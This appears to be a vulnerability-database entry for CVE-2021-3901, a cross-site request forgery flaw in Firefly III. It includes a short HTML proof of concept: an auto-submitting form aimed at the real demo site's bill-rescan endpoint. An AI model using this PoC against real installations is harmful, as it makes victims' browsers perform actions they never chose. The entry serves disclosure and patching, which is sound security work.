Lucene search
Amammad62508FDC-C26B-4312-BF75-FD3A3F997464HistoryOct 23, 2021 - 9:27 a.m.
Cross-Site Request Forgery (CSRF) in firefly-iii/firefly-iii
2021-10-2309:27:00
amammad
www.huntr.dev
3
0.001 Low
EPSS
Percentile
47.9%
Description
there is a CSRF on Run rules again action
Proof of Concept
// PoC.html
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://demo.firefly-iii.org/bills/rescan/2">
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Related
nvd
nvd
CVE-2021-3901
2021-10-27 21:15:07
cve
cve
CVE-2021-3901
2021-10-27 21:15:07
prion
prion
Cross site request forgery (csrf)
2021-10-27 21:15:00
osv
osv
CVE-2021-3901
2021-10-27 21:15:07
Cross-Site Request Forgery in firefly-iii
2021-10-28 23:14:14
github
github
Cross-Site Request Forgery in firefly-iii
2021-10-28 23:14:14
cnvd
cnvd
firefly-iii Cross-site Request Forgery Vulnerability (CNVD-2022-19846)
2021-10-31 00:00:00
veracode
veracode
Cross-site Request Forgery (CSRF)
2021-10-28 05:48:37
cvelist
cvelist
CVE-2021-3901 Cross-Site Request Forgery (CSRF) in firefly-iii/firefly-iii
2021-10-27 20:50:09